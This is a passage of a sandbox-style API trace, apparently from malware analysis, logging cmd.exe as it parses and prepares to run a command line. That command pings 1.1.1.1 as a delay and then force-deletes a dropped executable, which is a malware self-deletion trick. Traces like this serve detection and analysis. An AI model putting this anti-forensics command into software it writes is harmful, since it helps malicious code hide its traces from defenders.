lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x0, lpData=0x16eb10*=0x40, lpcbData=0x16eb08*=0x1000) returned 0x2 [0072.407] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x4, lpData=0x16eb10*=0x1, lpcbData=0x16eb08*=0x4) returned 0x0 [0072.407] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x0, lpData=0x16eb10*=0x1, lpcbData=0x16eb08*=0x1000) returned 0x2 [0072.407] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x4, lpData=0x16eb10*=0x0, lpcbData=0x16eb08*=0x4) returned 0x0 [0072.408] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x4, lpData=0x16eb10*=0x9, lpcbData=0x16eb08*=0x4) returned 0x0 [0072.408] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x4, lpData=0x16eb10*=0x9, lpcbData=0x16eb08*=0x4) returned 0x0 [0072.408] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb0c, lpData=0x16eb10, lpcbData=0x16eb08*=0x1000 | out: lpType=0x16eb0c*=0x0, lpData=0x16eb10*=0x9, lpcbData=0x16eb08*=0x1000) returned 0x2 [0072.408] RegCloseKey (hKey=0x68) returned 0x0 [0072.408] time (in: timer=0x0 | out: timer=0x0) returned 0x5f1ae117 [0072.408] srand (_Seed=0x5f1ae117) [0072.408] GetCommandLineW () returned="cmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"" [0072.408] GetCommandLineW () returned="cmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"" [0072.409] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6a5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0072.409] GetProcessHeap () returned 0x2d0000 [0072.409] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x210) returned 0x2e20f8 [0072.409] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0072.448] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0072.448] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0072.448] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0072.448] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0072.448] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0072.448] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0072.448] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0072.448] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0072.448] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0072.448] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0072.448] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0072.448] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0072.448] GetProcessHeap () returned 0x2d0000 [0072.448] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e2be0 | out: hHeap=0x2d0000) returned 1 [0072.448] GetEnvironmentStringsW () returned 0x2e2310* [0072.448] GetProcessHeap () returned 0x2d0000 [0072.448] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xaf2) returned 0x2e4cb0 [0072.449] FreeEnvironmentStringsW (penv=0x2e2310) returned 1 [0072.449] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0072.449] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0072.449] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0072.449] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0072.449] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0072.449] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0072.449] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0072.449] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0072.449] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0072.449] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0072.449] GetProcessHeap () returned 0x2d0000 [0072.449] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x54) returned 0x2e17c8 [0072.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f8d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0072.449] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16f8d0, lpFilePart=0x16f8cc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f8cc*="Desktop") returned 0x25 [0072.449] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0072.449] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f64c | out: lpFindFileData=0x16f64c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x2e57b0 [0072.449] FindClose (in: hFindFile=0x2e57b0 | out: hFindFile=0x2e57b0) returned 1 [0072.449] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f64c | out: lpFindFileData=0x16f64c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2d0ff0 [0072.450] FindClose (in: hFindFile=0x2d0ff0 | out: hFindFile=0x2d0ff0) returned 1 [0072.450] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0072.450] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f64c | out: lpFindFileData=0x16f64c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc1a62260, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x2d0ff0 [0072.450] FindClose (in: hFindFile=0x2d0ff0 | out: hFindFile=0x2d0ff0) returned 1 [0072.450] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0072.450] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0072.450] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0072.450] GetProcessHeap () returned 0x2d0000 [0072.450] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e4cb0 | out: hHeap=0x2d0000) returned 1 [0072.450] GetEnvironmentStringsW () returned 0x2e41b0* [0072.450] GetProcessHeap () returned 0x2d0000 [0072.450] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb46) returned 0x2e4d00 [0072.450] FreeEnvironmentStringsW (penv=0x2e41b0) returned 1 [0072.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6a5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0072.450] GetProcessHeap () returned 0x2d0000 [0072.450] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e17c8 | out: hHeap=0x2d0000) returned 1 [0072.450] GetProcessHeap () returned 0x2d0000 [0072.450] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x400e) returned 0x2e5850 [0072.451] GetProcessHeap () returned 0x2d0000 [0072.451] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xca) returned 0x2d0ff0 [0072.451] GetProcessHeap () returned 0x2d0000 [0072.451] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5850 | out: hHeap=0x2d0000) returned 1 [0072.451] GetConsoleOutputCP () returned 0x1b5 [0072.451] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6a4260 | out: lpCPInfo=0x4a6a4260) returned 1 [0072.451] GetUserDefaultLCID () returned 0x409 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a6a4950, cchData=8 | out: lpLCData=":") returned 2 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fa10, cchData=128 | out: lpLCData="0") returned 2 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa10, cchData=128 | out: lpLCData="0") returned 2 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa10, cchData=128 | out: lpLCData="1") returned 2 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a6a4940, cchData=8 | out: lpLCData="/") returned 2 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a6a4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a6a4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a6a4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a6a4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a6a4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a6a4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a6a4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a6a4930, cchData=8 | out: lpLCData=".") returned 2 [0072.452] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a6a4920, cchData=8 | out: lpLCData=",") returned 2 [0072.452] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0072.454] GetProcessHeap () returned 0x2d0000 [0072.454] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20c) returned 0x2e2e60 [0072.454] GetConsoleTitleW (in: lpConsoleTitle=0x2e2e60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0072.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0072.454] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0072.454] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0072.454] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0072.455] GetProcessHeap () returned 0x2d0000 [0072.455] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x400a) returned 0x2e5850 [0072.455] GetProcessHeap () returned 0x2d0000 [0072.455] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5850 | out: hHeap=0x2d0000) returned 1 [0072.456] _wcsicmp (_String1="ping", _String2=")") returned 71 [0072.456] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0072.456] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0072.456] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0072.456] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0072.456] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0072.456] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0072.456] GetProcessHeap () returned 0x2d0000 [0072.456] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x58) returned 0x2d10c8 [0072.456] GetProcessHeap () returned 0x2d0000 [0072.456] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x12) returned 0x2e1800 [0072.457] GetProcessHeap () returned 0x2d0000 [0072.457] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x36) returned 0x2d1128 [0072.457] GetProcessHeap () returned 0x2d0000 [0072.457] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2d0830 [0072.457] GetProcessHeap () returned 0x2d0000 [0072.457] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x10) returned 0x2dffc0 [0072.457] GetProcessHeap () returned 0x2d0000 [0072.457] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x38) returned 0x2d1168 [0072.458] GetProcessHeap () returned 0x2d0000 [0072.458] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x58) returned 0x2d11a8 [0072.458] _wcsicmp (_String1="Del", _String2=")") returned 59 [0072.458] _wcsicmp (_String1="FOR", _String2="Del") returned 2 [0072.458] _wcsicmp (_String1="FOR/?", _String2="Del") returned 2 [0072.458] _wcsicmp (_String1="IF", _String2="Del") returned 5 [0072.459] _wcsicmp (_String1="IF/?", _String2="Del") returned 5 [0072.459] _wcsicmp (_String1="REM", _String2="Del") returned 14 [0072.459] _wcsicmp (_String1="REM/?", _String2="Del") returned 14 [0072.459] GetProcessHeap () returned 0x2d0000 [0072.459] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x58) returned 0x2d1208 [0072.459] GetProcessHeap () returned 0x2d0000 [0072.459] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x10) returned 0x2dffd8 [0072.460] GetProcessHeap () returned 0x2d0000 [0072.460] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x7c) returned 0x2e3078 [0072.461] GetProcessHeap () returned 0x2d0000 [0072.461] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x18) returned 0x2d1268 [0072.461] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.461] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.461] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.461] GetFileType (hFile=0x7) returned 0x2 [0072.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0072.461] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f8a4 | out: lpMode=0x16f8a4) returned 1 [0072.462] _dup (_FileHandle=1) returned 3 [0072.462] _close (_FileHandle=1) returned 0 [0072.462] _wcsicmp (_String1="Nul", _String2="con") returned 11 [0072.463] CreateFileW (lpFileName="Nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16f874, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0072.463] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 1 [0072.463] GetConsoleTitleW (in: lpConsoleTitle=0x16f6a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0072.463] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0072.463] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0072.463] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0072.463] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0072.463] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0072.463] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0072.464] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0072.464] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0072.464] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0072.464] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0072.464] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0072.464] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0072.464] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0072.464] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0072.464] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0072.464] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0072.464] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0072.464] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0072.464] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0072.464] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0072.464] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0072.464] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0072.464] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0072.464] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0072.464] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0072.464] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0072.464] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0072.464] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0072.464] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0072.464] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0072.464] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0072.464] _wcsicmp (_String1="ping", _String2="START") returned -3 [0072.464] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0072.464] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0072.464] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0072.464] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0072.464] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0072.464] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0072.464] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0072.465] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0072.465] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0072.465] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0072.465] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0072.465] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0072.465] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0072.465] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0072.465] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0072.465] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0072.465] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0072.465] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0072.465] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0072.465] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0072.465] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0072.465] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0072.465] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0072.465] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0072.465] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0072.465] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0072.465] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0072.465] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0072.465] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0072.465] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0072.465] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0072.465] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0072.465] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0072.465] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0072.465] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0072.465] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0072.465] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0072.465] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0072.465] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0072.466] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0072.466] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0072.466] _wcsicmp (_String1="ping", _String2="START") returned -3 [0072.466] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0072.466] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0072.466] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0072.466] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0072.466] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0072.466] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0072.466] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0072.466] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0072.466] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0072.466] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0072.466] _wcsicmp (_String1="ping", _String2="FOR") returned 10 [0072.466] _wcsicmp (_String1="ping", _String2="IF") returned 7 [0072.466] _wcsicmp (_String1="ping", _String2="REM") returned -2 [0072.466] GetProcessHeap () returned 0x2d0000 [0072.466] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x210) returned 0x2e3100 [0072.466] GetProcessHeap () returned 0x2d0000 [0072.466] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x42) returned 0x2d1288 [0072.466] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0072.466] GetProcessHeap () returned 0x2d0000 [0072.466] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x418) returned 0x2e41b0 [0072.467] SetErrorMode (uMode=0x0) returned 0x0 [0072.467] SetErrorMode (uMode=0x1) returned 0x0 [0072.467] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e41b8, lpFilePart=0x16f1c4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f1c4*="Desktop") returned 0x25 [0072.467] SetErrorMode (uMode=0x0) returned 0x1 [0072.467] GetProcessHeap () returned 0x2d0000 [0072.467] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e41b0, Size=0x5e) returned 0x2e41b0 [0072.467] GetProcessHeap () returned 0x2d0000 [0072.467] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e41b0) returned 0x5e [0072.467] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0072.467] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0072.467] GetProcessHeap () returned 0x2d0000 [0072.467] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x120) returned 0x2e3318 [0072.467] GetProcessHeap () returned 0x2d0000 [0072.467] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x238) returned 0x2e3440 [0072.474] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e3440, Size=0x122) returned 0x2e3440 [0072.474] GetProcessHeap () returned 0x2d0000 [0072.474] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e3440) returned 0x122 [0072.474] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0072.474] GetProcessHeap () returned 0x2d0000 [0072.474] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe0) returned 0x2e3570 [0072.474] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e3570, Size=0x76) returned 0x2e3570 [0072.474] GetProcessHeap () returned 0x2d0000 [0072.474] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e3570) returned 0x76 [0072.476] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.476] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ef40) returned 0xffffffff [0072.476] GetLastError () returned 0x2 [0072.476] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x16ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ef40) returned 0xffffffff [0072.476] GetLastError () returned 0x2 [0072.476] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.477] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ef40) returned 0x2e35f0 [0072.477] GetProcessHeap () returned 0x2d0000 [0072.477] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x2e3630 [0072.477] FindClose (in: hFindFile=0x2e35f0 | out: hFindFile=0x2e35f0) returned 1 [0072.477] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x16ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ef40) returned 0xffffffff [0072.477] GetLastError () returned 0x2 [0072.477] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x16ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ef40) returned 0x2e35f0 [0072.477] GetProcessHeap () returned 0x2d0000 [0072.477] RtlReAllocateHeap 